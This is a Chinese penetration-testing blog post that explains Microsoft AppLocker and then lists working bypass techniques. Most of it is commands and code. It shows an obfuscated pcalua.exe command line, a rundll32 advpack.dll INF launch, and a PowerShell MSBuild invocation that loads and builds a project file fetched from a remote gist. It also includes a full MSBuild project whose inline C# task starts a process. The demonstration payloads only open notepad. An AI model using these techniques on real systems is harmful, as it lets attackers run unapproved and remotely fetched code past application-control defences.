最新消息:

AppLocker_Bypass List

渗透测试 demon 929浏览 0评论

AppLocker是什么?

适用于:Windows 7,Windows 8.1,Windows Server 2008 R2,Windows Server 2012 R2,Windows Server 2012,Windows 8

IT专业人员的这一主题描述了AppLocker的功能以及其功能与软件限制策略的不同之处。

在Windows Server 2008 R2和Windows 7中引入了AppLocker,可以提升软件限制策略的应用程序控制功能和功能。AppLocker包含新的功能和扩展,允许您创建规则以允许或拒绝应用程序基于文件的唯一标识运行,并指定哪些用户或组可以运行这些应用程序。

使用AppLocker,您可以:

  • 控制以下类型的应用程序:可执行文件(.exe和.com),脚本(.js,.ps1,.vbs,.cmd和.bat),Windows安装程序文件(.mst,.msi和.msp),和DLL文件(.dll和.ocx)以及打包的应用程序和打包的应用程序安装程序(appx)。
  • 根据从数字签名导出的文件属性定义规则,包括发布者,产品名称,文件名和文件版本。例如,您可以基于通过更新持续存在的发布者属性创建规则,也可以为特定版本的文件创建规则。
  • 将规则分配给安全组或单个用户。
  • 创建规则的例外。例如,您可以创建一个允许除注册表编辑器(Regedit.exe)以外的所有Windows进程运行的规则。
  • 在执行之前,使用仅审计模式来部署策略并了解其影响。
  • 导入和导出规则。进口和出口影响整个政策。例如,如果您导出策略,则导出所有规则集合中的所有规则,包括规则集合的强制设置。如果您导入策略,则会覆盖现有策略中的所有条件。
  • 通过使用Windows PowerShell cmdlet简化创建和管理AppLocker规则。

AppLocker有助于减少管理开销,并通过减少用户运行未经批准的应用程序所产生的帮助台呼叫数量,帮助降低组织管理计算资源的成本。

1.pcalua.exe:

p^c^a^l^u^a^ ^-^n^ ^-^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a
^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a
^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a
^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a
^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a
^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a
^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a
^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^
n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a
^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n
^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a
^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n
^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n notepad.exe

2.Language LUA in Files .wlua:

3.INF-SCT

rundll32.exe advpack.dll,LaunchINFSection  c:\test.inf,DefaultInstall_SingleUser,1,

https://twitter.com/bohops/status/967486047839014913

https://gist.githubusercontent.com/bohops/693dd4d5dbfb500f1c3ace02622d5d34/raw/902ed953a9188b27e91c199b465cddf855c7b94f/test.inf

https://github.com/homjxi0e/AppLockerBPG

4.MSBuild.exe

Local Invocation
================
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = "c:\test\test.csproj";
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.Build();
or
Add-Type -Path "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.dll"
$proj = "c:\test\test.csproj";
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.Build();
Remote Invocation
=================
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/bohops/a29a69cf127ffb0e37622d25b9f79157/raw/35fa4c5a0d2db037220f224b5c4c269ea243b3bd/test.csproj");
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.Build();
or
Add-Type -Path "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.dll"
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/bohops/a29a69cf127ffb0e37622d25b9f79157/raw/35fa4c5a0d2db037220f224b5c4c269ea243b3bd/test.csproj");
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.Build();
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Hello">
   <FragmentExample />
   <ClassExample />
  </Target>
  <UsingTask
    TaskName="FragmentExample"
    TaskFactory="CodeTaskFactory"
 AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>
      <Using Namespace="System" />  
      <Code Type="Fragment" Language="cs">
        <![CDATA[		
        ]]>
      </Code>
    </Task>
  </UsingTask>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
  <Task>
  <!-- <Reference Include="System.IO" /> Example Include -->		
      <Code Type="Class" Language="cs">
        <![CDATA[
      using System;
      using System.Diagnostics;
      using Microsoft.Build.Framework;
      using Microsoft.Build.Utilities;
        
      public class ClassExample :  Task, ITask
      {
        public override bool Execute()
        {
                    System.Diagnostics.Process proc = new System.Diagnostics.Process();
                    proc.StartInfo.FileName = "c:\\windows\\system32\\notepad.exe";
                    proc.Start();						
          return true;
        }
      }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

https://twitter.com/bohops/status/971026915736899585

https://gist.github.com/bohops/a29a69cf127ffb0e37622d25b9f79157

转载请注明:即刻安全 » AppLocker_Bypass List

您必须 登录 才能发表评论!



合作伙伴